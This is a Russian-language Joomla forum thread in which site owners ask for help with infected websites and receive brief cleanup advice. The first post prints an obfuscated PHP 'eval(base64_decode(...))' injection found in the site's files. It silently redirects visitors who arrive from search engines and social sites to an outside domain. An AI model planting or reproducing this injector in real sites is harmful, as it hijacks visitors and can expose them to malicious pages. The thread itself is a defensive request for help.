0 Пользователей и 1 Гость просматривают эту тему.
  • 5 Ответов
  • 2191 Просмотров
*

farmay

  • Захожу иногда
  • 338
  • 10 / 4
  • Все так как должно быть...
Вирусы на сайте.
« : 06.02.2012, 01:22:07 »
Доброй ночи. Собственно проблема не новая, на сайте появились вирусы. Сайт www.antimebel56.ru
Почти уверен что это было через FTP, пароли пока не менял все равно пока не знаю как решить проблему.

Яндекс прислал такое письмо:
Цитировать
Здравствуйте!

По данным поиска Яндекса, на Вашем сайте antimebel56.ru есть страницы, которые могут представлять угрозу для компьютеров посетителей. Поэтому в результатах поиска Яндекса ссылки на эти страницы помечаются как потенциально опасные.

Подробная информация о заражении Вашего сайта размещена на странице http://yandex.ru/infected?url=antimebel56.ru&l10n=ru .

Пожалуйста, удалите вредоносный код со страниц сайта. И после следующей проверки Яндекс уберёт из результатов поиска пометку о потенциальной опасности на Вашем сайте. Дополнительную информацию о поиске и удалении вредоносного кода Вы найдёте на странице http://help.yandex.ru/webmaster/?id=1059440#1059448.

Кроме того, мы рекомендуем Вам проверить сайт на наличие уязвимостей, которые могли привести к появлению на его страницах опасного содержимого. Советуем установить обновления системы управления сайтом и изменить пароли доступа администратора.

Для получения дополнительных данных о нарушении безопасности antimebel56.ru, в том числе списка инфицированных страниц, зарегистрируйте сайт в Яндекс.Вебмастере (http://webmaster.yandex.ru). Через этот сервис также можно запросить перепроверку сайта сразу после удаления вредоносного кода с его страниц.


Симптомы на сайте такие:

1. При попытке зайти под своим логином и паролем в административную зону выдает не понятную кодировку.

2. Если нажать на любую ссылку все такие выдает нормальную кодировку, но при попытке сохранить изменение общих настроек сайта выдает белый экран без сохранения.
3. Обновил Joomla через компонент AdminTools  до 1.5.25 На один день все заработало, но потом опять пошли глюки. Теперь при попытке зайти в AdminTools - белый экран.
4. Если попытаться зайти на сайт через поиск то перекидывает на какие то сомнительные сайты, напрямую же заходит нормально.


Прочитал тут про какой то код base64 и нашел во многих файлах в самом верху сайта этот код:
Код
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

Очень надеюсь на ваши советы по устранению этой заразы.
*

hamer

  • Захожу иногда
  • 53
  • 1 / 0
Re: Вирусы на сайте.
« Ответ #1 : 06.02.2012, 01:26:53 »
Проверьте индексные файлы .php - шаблонов на вредоносный код, обычно он располагается в конце кода. его трудно не заметить, это либо жава скрипт, либо вызов exe-ка, либо вы увидите бооооооооооооооооооооооооооооольшой код непонятных значений.

и гляньте кодировку бд и кодировку в шаблоне, какая стоит
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
*

alexvai

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Re: Вирусы на сайте
« Ответ #3 : 25.05.2013, 23:08:56 »
Столкнулся с вирусами на своих сайтах. Зараженные файлы имеют разрешение 0000 , меняю на 0644.Удаляю.Но после обновления они появляются снова.
Прогоняю весь сайт на предмет поиска вирусов из Cpanel. Нахожу кучу зараженных файлов. Запускаю процесс удаления.Пишет, что все прошло нормально, но после повторной проверки вижу, что зараженные файлы снова на месте.
Хостинг мультимедийный.Грохать все сайты на нем и переустанавливать рука не поднимается.
ftp не пользуюсь.Заражение произошло через установку непроверенного компонента или модуля.
Что делать?
OCE не помогла..
« Последнее редактирование: 25.05.2013, 23:28:03 от alexvai »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирусы на сайте
« Ответ #4 : 25.05.2013, 23:25:08 »

Что делать?


то на что рука не поднимается и притом все разом, в противном случае весь остаток жизни потратите на это
*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Вирусы на сайте
« Ответ #5 : 25.05.2013, 23:53:42 »
Что делать?

Лечить. Удалять источник заражения.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

На сайте появился вирус

Автор Lifar

Ответов: 3
Просмотров: 137
Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite
Регистрируются боты на сайте непрерывно.

Автор Stich SPb

Ответов: 27
Просмотров: 12218
Последний ответ 22.02.2021, 17:42:48
от soty20
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 792
Просмотров: 253081
Последний ответ 23.02.2020, 21:18:16
от draff
Помгите удалить вирус на сайте. В теме понимаю, но найти вирус не могу(

Автор Anvesinus

Ответов: 2
Просмотров: 785
Последний ответ 21.07.2019, 17:46:09
от Anvesinus
Инструкция по блокировке нежелательных ботов на сайте

Автор yuri-it

Ответов: 7
Просмотров: 891
Последний ответ 11.12.2018, 20:06:10
от stepan39